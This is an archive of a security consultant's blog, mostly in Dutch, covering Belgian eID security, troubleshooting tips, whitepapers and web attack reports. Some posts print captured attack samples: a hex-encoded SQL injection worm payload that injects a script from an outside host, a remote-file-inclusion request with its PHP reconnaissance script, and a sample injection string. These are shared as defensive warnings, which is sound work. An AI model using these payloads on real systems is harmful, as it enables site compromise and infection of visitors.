Erwin Geirnaert

Moved my blog

2010-03-01T02:21:00.000-08:00

Hi all,

I moved my blog to http://www.zionsecurity.com/blog.aspx?show=Blog

My first blog post is about the unsecure implementation of the Belgian eID module in Drupal!

Hope to see you there,

Erwin

Windows Mobile & ActiveSync troubleshooting

2009-11-03T03:47:00.000-08:00

in English because I didn't find a good solution online!
Problem: ActiveSync stopped working this weekend, and I received an error like "you don't have permissions in Exchange to sync" but that was BS. Nothing changed on my account.
We had a customer with the same problem a few weeks ago: the same no permissions error and ActiveSync stopped working. This had to do, I think, with the change of summer to winter time and an incorrect date/time setting on the Windows Mobile.
We all use client certificates, generated by our certificate authority and checking the properties of the certificate on my windows mobile showed that it was expired on Halloween! No error message indicating anything like it.
Copy and installing a new certificate on my Windows Mobile with private key didn't solve the problem immediately. I think ActiveSync still used the old certificate but deleting the old certificate and rebooting the device solved the ActiveSync problem!

I hope this is useful for some people because I was able to find the error message but not the solution!

10 tips voor een veilige e-ID implementatie

2009-08-03T08:15:00.000-07:00

Nieuwe whitepaper waarin we 10 tips meegeven voor een veilige implementatie van de Belgische elektronische identiteitskaart voor een web applicatie. Meer op http://www.zionsecurity.com/downloads/articles/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx

Whitepaper ivm de selectie voor een veilige open-source CMS online

2009-07-31T02:36:00.000-07:00

Onze whitepaper waarbij we Drupal, Joomla! en Typo3 vergelijken op basis van kwetsbaarheden, OWASP Top 10 en dergelijk is nu online te bekijken op onze nieuwe web site: http://www.zionsecurity.com/downloads/whitepapers/whitepaper-selecting-a-secure-open-source-content-management-system.aspx

SQL Injection worm is nog altijd alive, en nu ook voor ASP.NET

2009-07-29T01:01:00.000-07:00

Onze web application firewall infrastructuur heeft een nieuwe variant gedetecteerd van de SQL Injection worm, die nu ook ASP.NET pagina's via Google aanvalt.

de payload:
POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005 \
200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760 \
06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006 \
2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730 \
065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006 \
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750 \
06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006 \
1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0 \
0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002 \
0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740 \
07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007 \
20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540 \
0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002 \
0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300 \
02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002 \
7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740 \
0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002 \
B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0 \
068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007 \
300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460 \
052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002 \
000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0 \
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006 \
5005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0

dit is ASCII HEX encoding. Burp Suite heeft hier geen problemen mee :)

Het enige verschil met de SQL injection worm van 2008 is de script payload met een link naar a0v.org/x.js (niet bezoeken!)

Beta testers voor onze Mollom client gezocht

2009-07-24T06:57:00.006-07:00

Voor wie Mollom niet kent: anti-spam oplossing voor web applicaties zodat er geen spam in berichten te recht komt. Wordt oa gebruikt door onze vrienden van Netlog.
Mollom heeft sinds het begin al 100 millioen berichten gestopt: http://mollom.com/blog/hundred-million-spam-attempts-blocked

ZION SECURITY heeft een plug-in voor IIS ontwikkeld waarbij we ASP en ASP.NEt sites kunnen integreren met Mollom, zonder dat er een lijn code aan de huidige applicatie moet worden gewijzigd.

interesse? contacteer ons op info@zionsecurity.com

BTW: Mollom heeft een gratis versie!

Nu ook op Twitter

2009-07-24T06:57:00.003-07:00

Te volgen via http://twitter.com/zionsecurity

Volgende whitepaper: vergelijking van Drupal, Typo3 en Joomla! op security

2009-07-24T06:57:00.001-07:00

Wordt volgende week gelanceerd!

Een overzicht van de problemen van web application security

2009-07-24T06:55:00.000-07:00

nieuwe whitepaper is online: http://www.zionsecurity.com/news/whitepaper-an-overview-of-the-current-situation-in-the-web-application-security-landscape.aspx

We geven een overzicht van de problemen, gebaseerd op statistieken van WhiteHat Security, de Web Hacking Incident database en onze ervaringen

Zend vs OWASP ESAPI is klaar

2009-06-10T07:41:00.000-07:00

Ik verwijs gewoon door naar onze website waar de whitepaper voorhanden is:
http://www.zionsecurity.com/downloads/whitepapers.aspx#ZENDWHITEPAPER

Een duidelijk overzicht van Zend vs OWASP Enterprise Security API en de OWASP Top 10.

Hopelijk zijn jullie er iets mee...

Zend & OWASP ESAPI for PHP

2009-05-19T13:35:00.002-07:00

Binnenkort publiceren we een whitepaper ivm het gebruik van het Zend framework voor software ontwikkeling en de tekortkomingen op vlak van beveiliging.

Got Twitter?

2009-05-19T13:35:00.001-07:00

Sinds kort ook ZION SECURITY op Twitter. Volg ons op http://twitter.com/zionsecurity

Welkom Cigital

2009-05-19T13:33:00.000-07:00

Cigital neemt de Europese activiteiten van Security Innovation Inc over. Dit bericht bevestigt de groeimarkt van software security in Europa.
Goed nieuws dus voor ons als software security experts.

Office 2007 over een VPN connectie

2009-05-19T13:26:00.000-07:00

Outlook 2007 heeft het moeilijk met een VPN connectie naar Exchange. Zoeken op Google geeft veel resultaten maar zonder concrete oplossingen. Uiteindelijk is het heel eenvoudig. Aangezien Exchange en Active Directory sterk geïntegreerd zijn, is DNS een belangrijke bron voor Outlook om te weten hoe en waar Exchange zich bevindt.
Outlook 2007 moet dus DNS queries kunnen versturen naar de corporate DNS Server. Als men niet op een corporate netwerk is geconnecteerd, dan gebruikt men de DNS server van de ISP die natuurlijk niet de nodige DNS entries heeft voor Outlook 2007. Men moen de VPN client dan configureren om de DNS voor het domein over de VPN tunnel te sturen naar de corporate DNS; Dit kan in Check Point dmv een SecureDNS Server toe te voegen als object en naar te verwijzen in de globale properties.

In English: to use Outlook 2007 across a VPN connection, the client must use the DNS server of the corporate network and not the DNS of the ISP. Also remote offices must use the DNS server of the corporate network to resolve the DNS queries for the local domain.

Interessant document ivm Core JEE patterns en security

2009-04-24T02:51:00.001-07:00

Secure Compass heeft de Core JEE patterns bekeken met een security pet op en een interessant document gemaakt over de beperkingen en de bijhorende controles die nodig zijn.

Interessant zou zijn om te bekijken waar de OWASP ESAPI voor Java kan worden gebruikt.

http://72.55.169.126/papers/Security%20Analysis%20of%20Core%20JEE%20Design%20Patterns%20v0%2020.pdf

SQL Injection - Deel 4

2008-06-25T06:14:00.000-07:00

Microsoft heeft drie tools gelanceerd om web site owners te helpen tegen het SQL Injection virus.

Eerst tool is voor source code analysis, tweede tool is een crawler zoals het virus en een derde tool is een beta versie van URLScan dat SQL Injection afblokt.

Ik zou zeggen: het wordt tijd om die te installeren en te gebruiken!

eID en de privacy

2008-06-16T05:48:00.000-07:00

Daarnet de video gezien over de "onveiligheid" van de eID vanop http://belsec.skynetblogs.be/post/5870586/belgian-eid--the-video-that-shows-how-good-ou
OK, de privacywall is niet echt zoals het moet. Maar het probleem is wel groter dan wat de video beweert. Om de data uit te lezen moet de gebruiker een programma opstarten, dus dit via e-mail binnenkrijgen of downloaden. Dit wordt op een bedrijfsnetwerk toch al beter tegengehouden dan 5 jaar geleden.

Ik herinner mij mijn presentatie op het seminarie van IT Works in 2005 over eID security waar ik duidelijk aangaf dat iedereen die op een web site kwam met daarin een hidden Java applet al zijn eID data kon worden uitgelezen (naam, adres, ...) omdat Internet Explorer en Firefox standaard de toelating geven.

En dat is pas een goede versie van Google Analytics :)

De enige pop-up die je krijgt in de browser is voor de PIN-code, wat ook kan worden gespoofed. Maar ja, van zodra je op de verkeerde website komt kunnen er veel ergere dingen gebeuren dan je familie naam en adres stelen.

Dus zoals SOS Piet zou zeggen: Wat hebben we vandaag geleerd?
1. Gebruik alleen de e-ID als de website HTTPS vereist en gebruikt (heel belangrijk want dit wordt veel vergetenà
2. Geef de PIN-code alleen in op een website die je vertrouwt (opnieuw, enkel als stap 1 bestaat)
3. Van zodra de authenticatie is gelukt verwijder de kaart uit de kaartlezer en laat die niet de ganse dag insteken

Stap 3 is natuurlijk moeilijk als je heel veel de e-ID moet gebruiken, maar ik denk dat we mogen stellen dat 80% van de gebruikers die de e-ID al hebben dit maar een paar keer per maand nodig hebben.

SQL Injection virus - Deel 3

2008-06-04T05:35:00.000-07:00

Zonet nog een ontdekking gedaan ivm het SQL Injection virus. Als de web site content importeert van geinfecteerde web sites dan is dit ook een manier om bezoekers te infecteren.

HTML encoderen van output is dus een must om bezoekers niet te infecteren.
Ook validatie van data imports is noodzakelijk.

SQL Injection virus - Deel 2

2008-06-04T04:33:00.000-07:00

Zojuist gezien dat er ook al web sites het virus bevatten die geschreven zijn in ASP.NET.
Dit betekent dus dat er een variant is die zich richt op ASPX extensies in Google.

Analyses en richtlijnen van Microsoft, http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx

Het is dus nog niet gedaan. Zeker als je weet dat er meer .NET web sites zijn om te infecteren.

Ondertussen detecteren de meeste anti-virus scanners het script, dus dat is een goeie zaak.
Als je met een up-to-date anti-virus scanner werkt natuurlijk.

PHP worm gedetecteerd

2008-06-02T04:20:00.000-07:00

Volgens mij gaat er een nieuwe worm rond die PHP sites infecteert.
Men maakt misbruik van een remote file inclusion bug in aide.php3. Dit is een Franstalig PHP pakket, GestArt.

Volgende trigger blokkeerde de request in onze ModSecurity:
GET /aide.php3?aide=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: :)
User-Agent: libwww-perl/5.76

Die id2.txt is een PHP script dat doorgeeft hoeveel diskspace het systeem over heeft:
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "netcat
";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "netcat
";
echo "uname -a: $un
";
echo "os: $os
";
echo "uptime: $up
";
echo "id: $id1
";
echo "pwd: $pwd1
";
echo "php: $php1
";
echo "software: $sof1
";
echo "server-name: $name1
";
echo "server-ip: $ip1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;

Iemand is dus op zoek naar gratis hosting!

Nieuwe SQL Injection worm - webmasters opgepast!

2008-05-16T04:35:00.000-07:00

Als u nog een website gebruikt met Microsoft ASP en een achterliggende databank, lees dan zeker verder.
Een nieuw virus is actief dat gebruik maakt van SQL Injection om zich te verspreiden en om web sites te infecteren met een virus. Bezoekers van dergelijke sites worden dan geïnfecteerd door kwaadaardig JavaScript.

Onderzoek van oa SecureWorks blijkt dat de SQL Injection attack gebeurt door geïnfecteerde PCs. Deze bots gebruiken Google om web sites te vinden met extensie .asp. Als een web site is geïdentifeerd dan probeert de bot om via SQL Injection een gevaarlijke payload weg te schrijven in de databank. Als deze databank wordt gebruikt als Content Management Systeem (CMS) dan zal op een web pagina deze payload worden meegegeven aan de bezoeker. De payload probeert om via JavaScript kwetsbaarheden in de browser en plug-ins zoals RealPlayer uit te buiten en zo een virus te installeren.

Ook Belgische web sites zijn geïnfecteerd.

Hebt u een web site in ASP, zorg er dan voor dat u alle parameters valideert om SQL Injection tegen te houden.

Is Acegi een J2EE security framework?

2007-09-17T07:56:00.000-07:00

Ik ben voor OWASP druk bezig met het OWASP Java Project waar ik probeer om de OWASP Top 10 2007 te herschrijven naar Java. Natuurlijk heb ik nu een paar bemerkingen die ik wil delen.

Spring maakt gebruik van Acegi en dus noemt Acegi nu Spring Security. Veel informatie is er niet te vinden, maar Acegi is eigenlijk een authorisatie-filter die toegang geeft tot URLs of niet. Acegi kijkt dus of je een geauthenticeerde sessie hebt en of je de toelating hebt om een bepaalde URL te openen. Hmmmm.... De ervaring leert mij dat ontwikkelaars en beheerders niet de gewoonte hebben om 2 verschillende applicaties en URLs te gebruiken voor hetzelfde doel. Dit betekent dat meestal een gebruiker en een beheerder inloggen op dezelfde applicatie en site. Dus dan wordt het moeilijk om granulaire authorisatie regels te definiëren. Hiermee moet men dus van in het begin rekening houden.

Maar wat ik mis in een dergelijk "security framework" is een rudimentaire beveiliging tegen typische aanvallen.
Voor mij moet een security framework (J2EE, PHP of .NET of ...) tot volgende zaken bevatten:
- authenticatie, liefst met sterke authenticatie
- authorisatie, op URL en objectniveau en eenvoudig te configureren en niet programmeren
- input validatie geïntegreerd met een deftige audit logging
- output encoding
- audit trail
- positieve security
- encapsulation van identiteit en propagation van identiteit

Ik ben nog altijd op zoek naar een J2EE applicatie die 3 van bovenstaande punten bevat!

Commentaar is meer dan welkom

2007-09-10T02:42:00.000-07:00

De laatste maanden toch een paar interessante projecten uitgevoerd (idd, geen vakantie dit jaar), waarbij een paar zaken waarvan ik dacht dat die quasi niet meer mogelijk zijn toch nog alive-and-kicking zijn.

Ten eerste: standaard gebruikersnamen en wachtwoorden. Ongelooflijk hoe eenvoudig je hiermee binnengeraakt op routers, FTP servers, ... en dan nog met admin rechten

Ten tweede: te veel vertrouwen in de gebruiker/bezoeker van de applicatie. Een gebruiker die te veel kan en mag is een slechte zaak vanuit een security standpunt. Dus waarom zijn de applicaties dan ook zo niet geschreven? Omdat het niet op papier staat.... Dan komen we terug op abuse cases en dergelijke

Ten derde: geen documentatie

Ten vierde: geen reactie! Niemand die het heeft opgemerkt dat er een probleem is en een hacker (ik dus :)) toegang had

Dus er is nog veel werk aan de winkel!

OWASP WebGoat en WebScarab

2007-09-10T02:36:00.000-07:00

Vorig week mocht ik op vraag van Seba een uur een sessie geven over WebGoat en WebScarab op de OWASP security dag. Er was een goede opkomst en een mix van programmeurs en security mensen.
Wat me vooral is bijgebleven is dat je toch wel heel technisch moet zijn om zelf uit te zoeken hoe WebGoat en WebScarab werken. Ik denk dat veel te maken heeft met het gebrek aan documentatie en de niet-intuïtieve gebruikersinterface van de twee tools. Aangezien ik er al 5 jaar mee speel is het voor mij natuurlijk wel heel gemakkelijk om die te gebruiken.
Het goede nieuws is dat als mensen wisten hoe alles te configureren is, ze toch wel goed kunnen volgen.
Het nog betere nieuws is dat de OWASP WebGoat Solution Guide af is. Dus dit wil zeggen dat er binnenkort een knop "Solution" te vinden is in elke WebGoat les zodat mensen die willen bijleren over web security beter hun weg vinden.

MSDN presentatie over Ajax & security

2007-06-08T07:41:00.000-07:00

Deze week had men mij gevraagd van Microsoft België om een presentatie te geven op een MSDN (Microsoft Developer Network) over ASP.NET AJAX en de security problemen.
Dit is natuurlijk een interessante uitdaging. Er valt heel veel over te vertellen en er kan ook veel fout gaan.
Maar het is natuurlijk niet evident om concepten als Javascript Hijacking en Cross-site-request-forgery uit te leggen als de mensen nog problemen hebben met zoiets als cross-site-scripting.
Als ik een presentatie geef dan heb ik altijd de gewoonte om het publiek een paar vragen te stellen. Dus als ik vroeg "wie heeft al gehoord van cross-site-scripting" dan stak de volledige cinema-zaal zijn hand op, maar als ik dan vroeg "wie begrijpt het concept" dan zag ik met moeite een paar vingers. En het is begrijpelijk! Cross-site-scripting is moeilijk te vertalen in iets eenvoudigs en zeker niet als onderdeel van een presentatie van 2 uur. Maar het concept is nodig om de andere kwetsbaarheden te kunnen uitleggen.
Voor mensen die geïnteresseerd zijn om meer te weten, ik geef een hands-on cursus "Improving your web applications security" eind juni. Meer informatie en inschrijven via deze PDF: http://www.zionsecurity.com/uploads/media/Improving_your_web_applications_security.pdf

Digitale radio en bandbreedte

2007-05-11T06:48:00.000-07:00

Vorige week een rare situatie meegemaakt. Mijn collega kreeg bij een klant een rapport van de ISP, waaruit bleek dat sinds een paar weken sommige dagen men een download van 3 tot 4 GB had, zelfs in het weekend. Natuurlijk zijn we als security mensen direct wantrouwig en er waren een paar mogelijke oorzaken:

PC die een peer-to-peer programma had staan om zaken zoals MP3s en DVDs af te halen
PC die geïnfecteerd was met een virus
Iemand die op het netwerk geconnecteerd was (bijv. via wireless) die geen toelating had
...

Hoe pak je dit nu aan? Gelukkig hadden we de firewall juist veranderd naar Check Point UTM-1. Voordeel van dergelijke firewall is de logging. En die hadden we dus voldoende.

Een uurtje logs bekijken gaf al heel snel de oplossing. Er waren geen rare poorten die werden gebruikt, buiten DNS, SMTP en HTTP verkeer. Maar op HTTP was er wel veel connecties van een bepaalde PC. En de URL was altijd dezelfde. Dus snel de URL opzoeken en dit bleek www.digitaleradio.be te zijn. Aha!

Dit is een streaming audio site, waar je dus gewoon naar digitale radio kunt luisteren. Maar wel aan een snelheid van 96 kilobyte per seconde. Dus dit betekent 96*60 = 5760 kilobyte per minuut of 5760*60= 345600 kilobyte per uur. Dus per uur een 345600/1024= 337,5 MB download. Dus een werkdag van 8 uur levert al snel een 3 tot 4 GB op. Voor 1 geconnecteerde PC!!!

En waarom dit in het weekend voorviel was snel uitgeklaard. Er werd in het weekend soms doorgewerkt.

Problemen met netwerk adaptors op XP

2007-05-11T06:39:00.000-07:00

Begin deze week een heel rare situatie meegemaakt. Ik had een programma, LinkScanner geïnstalleerd dat URLs screent op exploits. Blijkbaar had dit programma de volledige windows netwerk socket aangepast. Omdat ik in de firewall logs rare HTTP traffiek zag naar een ADSL adres in Israel (!), besloot ik om het programma te verwijderen om te kijken of de traffiek stopte. Aangezien ik altijd met 5 zaken tegelijk bezig ben, had ik tijdens de uninstall ook een VPN connectie opgestart met Check Point SecureClient. Plots stopte de SecureClient met een bizarre foutmelding: SecureClient failed to start. Please re-install.
Een reboot loste het probleem niet op. Ik kreeg een pop-up dat een service van SecureClient niet kon opstarten.
Dan maar de laatste nieuwe versie installeren.
Reboot.
Zelfde errors.
Geen VPN.
Paniek.
En dan kreeg ik een inval. Ik had vroeger al eens een gelijkaardig probleem geconstateerd bij een PC van een klant. De LSPs (iets te maken met registry keys en netwerk adaptors/sockets) waren corrupt. Ik heb dan een gratis tool gedownload, LSP-Fix en dit laten draaien. Hij vond direct een paar zaken die te maken hadden met de uninstall van LinkScanner. De registry keys verwezen nog naar de DLL die ondertussen is verwijderd door de uninstall. Gelukkig kan LSP-Fix dit verhelpen. En inderdaad, een reboot en de VPN client werkt zoals het moet. LSP-Fix kan je hier vinden: http://www.cexx.org/lspfix.htm

Cross-site-scripting in Blogger?

2007-04-23T01:56:00.000-07:00

De lezers zullen zich nu wel afvragen waarom ze een Javascript pop-up zien met daarin de boodschap XSS. Blijkbaar is de cross-site-scripting attack die ik aanhaalde als voorbeeld in de blog over web application firewalls uitvoerbaar. U leest het goed. Als blogger kan ik dus Javascript uitvoeren die vanuit een 'trusted' omgeving wordt uitgevoerd. In vaktermen noemen we dit een persistent XSS want die wordt opgeslaan in de blog zelf.
Ik heb direct contact genomen met Google, maar blijkbaar moet ik heel veel moeite doen om ze te overtuigen dat dit effectief een security issue is. Ongelooflijk!
Dus er komt zeker een vervolg...

Waarom een web application firewall?

2007-04-17T12:24:00.000-07:00

Ik was eerst van plan om een artikel te schrijven over de beveiliging van open-source content management systems maar ik zal eerst een kader scheppen :-)
Vandaar dit bericht!
Voor de mensen die dit lezen en die zeggen: web application firewall?! Een mooi Nederlands woord bestaat er niet buiten webstek vuurmuur...

Een web application firewall laat toe om inkomend en uitgaand HTTP verkeer te controleren op inhoud. Waarom? Om aanvallen te detecteren en af te blokken. Aanvallen? Inderdaad: alle web sites worden dagelijks aangevallen door virussen, automatische scanners en hackers. Die zoeken kwetsbaarheden in de applicatie om te misbruiken en verder toegang te krijgen tot de achterliggende databank, informatie of netwerk. Meer informatie op www.owasp.org.

Ik heb al honderden programmeurs verbaasd doen kijken met volgende vraag: "Kan je in jouw logfiles zien dat jouw applicatie wordt aangevallen, nu en hoe?" Ik heb nog nooit, ik herhaal nooit, een positief antwoord gekregen. Applicaties zijn niet gemaakt om aanvallen te detecteren, af te blokken en een alarm te geven. Waarom? Dit is geen functionele requirement, dus niet geïmplementeerd. Maar dit moet wel zo zijn!

Vandaar dat een web application firewall (waf) nodig is. En er is zelfs een open-source versie: ModSecurity (www.modsecurity.org). ModSecurity is een plugin voor Apache die inkomend en uitgaand HTTP verkeer controleert met regels. Die regels definiëren wat er niet mag aanwezig zijn in parameters bijvoorbeeld of 1 0R 1=1

Het mooie aan een waf is dat dit geen verandering aan de applicatie vereist. Je plaats dit op een netwerkniveau voor de bestaande web applicaties en met behulp van mod_proxy kan je al die sites publishen.

ModSecurity is compileerbaar op heel veel platformen. Ik heb dit overlaatst gecompileerd op een SuSe voor PowerPC bovenop IBM iSeries en dit werkt perfect! Zelfs heel performant!

En dit zou niet open-source zijn als er geen "Core Rules" bestaan die veel aanvallen detecteren, maar niet afblokken. Er is zelf een Console, niet open-source wel gratis voor 3 sensors die je op de kan gebruiken om op de hoogte te blijven van transacties en aanvallen.

Als jullie bijkomende vragen hebben, laat maar een comment na en ik zal trachten een antwoord te geven. Indien nodig, contacteer ik wel de maker van ModSecurity, Ivan Ristic.

Hoe de elektronische identiteitskaart gebruiken in IIS 6.0

2007-03-27T02:02:00.000-07:00

Na een paar dagen zoeken en niets vinden, uiteindelijk toch de oplossing gevonden!
De beste en enige manier om HTTPS te configureren voor de elektronische identiteitskaart in een paar eenvoudige stappen:

Installeer een server certificaat in IIS
Download het belgiumrca.cer certificaat van http://certs.eid.belgium.be en importeer dit in de Local Machine - Trusted Root Certificate Authorities
Maak een Certificate Trust List in IIS met het Belgium Root CA certificaat

Meer is het niet.

Wat je zeker niet mag doen: het Citizen CA certificaat importeren! Blijkbaar zijn deze niet uniek. Als je een e-ID hebt uitgereikt door een andere Citizen CA dan kan je niet inloggen.

De error die je dan krijgt is "The certificiate is ill-formed or is not trusted by the web server".

Een Nederlandstalige blog over security

2007-03-27T01:28:00.000-07:00

Ik heb besloten om een blog op te starten in het Nederlands waarbij ik mijn visie, ervaring en verdere opmerkingen kan bundelen die over security gaan. Waarom in het Nederlands? Wel, ik vind dat er te weinig informatie op Internet staat die zich specifiek richt op Nederlandstalige collega's in de IT wereld.

Ik hoop dus dat ik hiermee bepaalde vragen of problemen kan helpen oplossen en ondertussen jullie op de hoogte kan houden ivm de laatste nieuwe trends, ontwikkelingen en aanvallen.